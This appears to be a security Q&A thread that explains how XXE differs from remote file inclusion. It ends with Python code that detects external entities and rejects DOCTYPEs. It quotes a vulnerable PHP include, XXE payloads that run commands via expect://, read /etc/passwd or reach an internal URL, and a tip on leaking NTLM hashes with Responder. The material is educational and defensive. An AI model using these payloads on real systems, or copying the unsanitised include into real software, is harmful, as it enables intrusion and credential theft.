
I was just studying about the XML external entities attack and Remote File Inclusion Attack.

According to my understanding, the XML external entities attack is where the XML parser in the web application has the option of external entities enabled and the attacker can parse an external XML from a remote server and execute commands or read local system files.

While the remote file inclusion attack is where the attacker is able to make the system execute the a file that lies on a remote server and the contents of this file may also be malicious and the attacker can access system level files or can even install a backdoor using this vulnerability.

I am not able to differentiate between XML external entities attack and remote file inclusion attack as both the attacks mean that a remote file execution can lead to leaking of the information.

Anders
Skynet

1 Answer

The most notorious programming language for remote file inclusion is PHP. The following is the PHP example code for a PHP remote file inclusion vulnerability from the Wikipedia article "File Inclusion Vulnerability". In this example, code from an external server is included, thus it is run by the vulnerable application. Remote file inclusion is a remote code execution class vulnerability.

<?php
   // 'language' is taken straight from the query string and used unsanitized
   // as an include path, so the caller controls which file (local or remote) is run.
   if ( isset( $_GET['language'] ) ) {
      include( $_GET['language'] . '.php' );
   }
?>

An XXE (XML External Entity) vulnerability can also be similar to the example above. The following example from OWASP abuses the expect scheme to execute code. This is only for PHP.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
  <user>&xxe;</user>
  <pass>mypass</pass>
</creds>

The expect scheme executes the command (on OS level, rather than as PHP code). PHP has a document that explains how the expect scheme is meant to be used.

But if we remove focus from PHP, and look at web applications in general, XXE can often only be abused to look at local files (or remote files the vulnerable web application has network access to). Commonly done with the following payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

Another misuse case for XXE is that it can be used to trigger sensitive calls to internal web applications using the GET method. For instance:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "https://internal.hawaii.gov/api/pacom/alert" >]><foo>&xxe;</foo>

But the bottom line is that remote file inclusion and XXE are unrelated. Both might lead to remote code execution. But generally, remote file inclusion is remote code execution and XXE is abused to steal data from local files (on the server).

Dog eat cat world
  • I pretty much got the above-stated examples, so we can only use XXE to access local stuff in a malicious (OS level) way, while in remote file execution we can access only the language level stuff (in the above case PHP). Is that right? – Skynet Jan 28 '18 at 01:45
  • Yeah, that's basically it. But another interesting abuse of XXE is to make the XML parser download an external file over a protocol that requires authentication. Sometimes, you can make the application leak its NTLM hash over SMB or over HTTP. This tool is good for this: https://github.com/SpiderLabs/Responder – Dog eat cat world Jan 28 '18 at 14:20
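The three XXE payloads quoted in the answer (the expect://, file:// and internal-URL variants) all share one structural feature: an external entity declared in the document's DTD. The following is an added example, not code from the answer or from OWASP, showing the defender's side of that: a small scanner that extracts the declared external entities (name, URI, scheme) so an attempt can be logged, and an untrusted-input parser that refuses any document carrying a DOCTYPE at all, which is the usual recommendation because it covers external entities, parameter entities and entity-expansion bombs with one check. The payload strings are constructed here from the ones in the answer (with the encoding attribute dropped); `find_external_entities`, `parse_untrusted`, `rejects` and `stdlib_refuses_external_entity` are names chosen for this example. The last function only illustrates that Python's `xml.etree` happens not to fetch external entities (it raises `ParseError` instead, as its documentation states); parsers that do resolve them, as the PHP examples above show, are exactly why the DOCTYPE check belongs in front of the parser rather than relying on parser defaults.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, NamedTuple
from urllib.parse import urlsplit


class ExternalEntity(NamedTuple):
    name: str        # entity name as declared, e.g. "xxe"
    parameter: bool  # True for parameter entities (%name;), resolved by the DTD itself
    uri: str         # the SYSTEM / PUBLIC identifier a resolving parser would fetch
    scheme: str      # URI scheme, e.g. "file", "https", "expect"


# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "pubid" "uri">
# with either quote style. Internal entities (<!ENTITY a "text">) do not match.
_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?:SYSTEM\s+(?P<sys>\"[^\"]*\"|'[^']*')"
    r"|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+(?P<pub>\"[^\"]*\"|'[^']*'))",
    re.IGNORECASE,
)
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def find_external_entities(xml_text: str) -> List[ExternalEntity]:
    """Return every external entity declared in the document's DTD subset."""
    found = []
    for m in _ENTITY_RE.finditer(xml_text):
        literal = m.group("sys") or m.group("pub")
        uri = literal[1:-1]  # strip the surrounding quotes
        found.append(ExternalEntity(
            name=m.group("name"),
            parameter=m.group("param") is not None,
            uri=uri,
            scheme=urlsplit(uri).scheme.lower(),
        ))
    return found


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse XML from an untrusted source, refusing any document with a DTD.

    Raises ValueError (listing the declared external entity URIs, for the
    application log) instead of handing a DOCTYPE to the parser at all.
    """
    if _DOCTYPE_RE.search(xml_text):
        ents = find_external_entities(xml_text)
        detail = ", ".join(f"{e.name}={e.uri}" for e in ents) or "no external entities"
        raise ValueError(f"DOCTYPE not allowed in untrusted XML ({detail})")
    return ET.fromstring(xml_text)


def rejects(xml_text: str) -> bool:
    """True if parse_untrusted refuses the document."""
    try:
        parse_untrusted(xml_text)
    except ValueError:
        return True
    return False


def stdlib_refuses_external_entity(xml_text: str) -> bool:
    """True if xml.etree itself refuses to expand the document's external entity.

    xml.etree never fetches external entities; it raises ParseError
    ("undefined entity") when the reference is encountered.
    """
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return True
    return False


# Constructed payloads, adapted from the three in the answer above.
EXPECT_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
    '  <!ENTITY xxe SYSTEM "expect://id" >]>\n'
    '<creds><user>&xxe;</user><pass>mypass</pass></creds>\n'
)
FILE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [\n'
    '  <!ELEMENT foo ANY >\n'
    '  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>\n'
)
SSRF_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [\n'
    '  <!ELEMENT foo ANY >\n'
    '  <!ENTITY xxe SYSTEM "https://internal.hawaii.gov/api/pacom/alert" >]><foo>&xxe;</foo>\n'
)
BENIGN = '<creds><user>bob</user><pass>mypass</pass></creds>'

if __name__ == "__main__":
    for label, doc in [("expect", EXPECT_PAYLOAD), ("file", FILE_PAYLOAD),
                       ("internal URL", SSRF_PAYLOAD), ("benign", BENIGN)]:
        print(label, "rejected" if rejects(doc) else "parsed",
              [(e.name, e.scheme, e.uri) for e in find_external_entities(doc)])
```

In a real service the `ValueError` branch is where the declared URIs go to the security log: the scheme alone (`file`, `expect`, an internal `https` host) already tells the responder which of the three misuse cases from the answer was attempted.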